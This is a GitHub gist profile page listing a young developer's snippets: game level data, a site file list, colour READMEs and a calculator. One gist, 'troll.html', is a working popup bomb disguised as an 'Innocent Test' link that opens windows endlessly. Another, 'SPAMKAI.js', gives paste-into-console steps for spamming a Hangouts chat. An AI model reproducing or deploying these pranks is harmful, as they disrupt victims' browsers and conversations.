Skip to content

Instantly share code, notes, and snippets.

View SheepTester's full-sized avatar
🐑
Existing

Sean SheepTester

🐑
Existing
View GitHub Profile
@SheepTester
SheepTester / troll.html
Created September 16, 2016 01:23
Innocent Test
<a href='data:text/html,<script>window.open("data:text/html,<script>"+document.querySelector("script").innerHTML+"</scr"+"ipt>","_blank","top=0,width=120");window.setInterval(function(){window.open("data:text/html,<script>"+document.querySelector("script").innerHTML+"</scr"+"ipt>","_blank","top=0,width=120");},100);</script>'>Click me if you are an idiot!</a>
@SheepTester
SheepTester / fireladderslammerupdatelevel.txt
Created October 20, 2016 03:11
The level data for the update's feature demonstration level.
[["Welcome to this version's feature demonstration. Climb up the ladder using the w key.","Fire will kill you. Use the lava to solid powerup to eradicate the fire.","The slammer powerup will reduce the gold to a weaker block when you press s."],
"@@@@@@@@@@@@@@@@",
"@e @@@>>>>>+",
"@e@1a @@@> >+",
"@e@ @> >+",
"@e@ +",
"@e@ffffff g;g +",
"@0@@@@@@@2>>>>>@"
]
@SheepTester
SheepTester / commit37.json
Created October 21, 2016 01:02
To demonstrate the new powerups
[["Remember to use space to activate a powerup!"],
"@@@@@@@@@@@@@@@@@@+@",
"@ @ @@ @",
"@ @@@@@@@ @",
"@ @ @@ @",
"@ @@@@ @",
"@ @ @@ @",
"@0t@@@@m@@@@@@@@@@o@"
]
@SheepTester
SheepTester / random_theflat.json
Last active February 10, 2017 04:04
A level that either kills or confettis you for the Flat.
{
"META":{"name":"Random","by":"Sean"},
"INIT":{"type":-1,"var":"t","rand":"2","then":{"if":"t","is":"0","then":"DIE","else":"WIN"}},
"WIN":"yay",
"DIE":"noo"
}
@SheepTester
SheepTester / sites.json
Last active January 13, 2018 19:57
All sites on SheepTester
["BLOCKLY, BLOG, LICENSE NOT INCLUDED",
["amend1",
"index.html",
"logo.svg",
"main.js",
"style.css"
],["animations",
["svg",
"cloud.svg",
"loading1.svg",
@SheepTester
SheepTester / README.md
Last active March 28, 2017 02:44
HTML colour names
@SheepTester
SheepTester / README.md
Last active March 28, 2017 03:43
Material design

source

black and white excluded

@SheepTester
SheepTester / README.md
Last active October 15, 2017 04:23
school math calculations

Math/School stuff

@SheepTester
SheepTester / SPAMKAI.js
Last active May 10, 2017 00:21
Spammer
/*
HOW TO USE
1) right click on the hangouts frame (like someone's speech bubble or something)
2) select inspect element
3) go to console
4) paste this code in (NOTE: YOU SHOULD NEVER BE DOING THIS)
5) press enter
6) go to the hangouts frame and lock enter while focused on the input field
*/
var beemovie, // variable for storing bee movie script
@SheepTester
SheepTester / calculator.html
Created September 23, 2017 03:30
Calculator I made in eighth grade
<html>
<!-- SEAN MADE THIS. https://plus.google.com/u/0/101749103627562194088/ -->
<head>
<title>Calculator v3</title>
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link href='https://fonts.googleapis.com/css?family=Comfortaa:300' rel='stylesheet' type='text/css'>
<style>#calc {